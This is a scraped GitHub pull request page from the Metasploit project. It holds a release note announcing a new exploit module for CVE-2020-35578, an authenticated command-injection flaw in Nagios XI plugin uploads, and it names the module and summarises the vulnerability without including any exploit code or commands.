@gwillcox-r7 gwillcox-r7 added the rn-modules release notes for new or majorly enhanced modules label Apr 14, 2021
@gwillcox-r7
Copy link
Contributor

gwillcox-r7 commented Apr 14, 2021
edited by pbarry-r7
Loading

Release Notes

New moduleexploits/linux/http/nagios_xi_plugins_filename_authenticated_rce exploits CVE-2020-35578, an RCE in Nagios XI versions prior to 5.8.0 that utilizes a command injection when uploading plugins to allow authenticated administrative users to gain remote code execution as the apache user on affected systems.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bcoles bcoles bcoles left review comments

@gwillcox-r7 gwillcox-r7 gwillcox-r7 approved these changes

Assignees

@gwillcox-r7 gwillcox-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@ErikWynter @bcoles @gwillcox-r7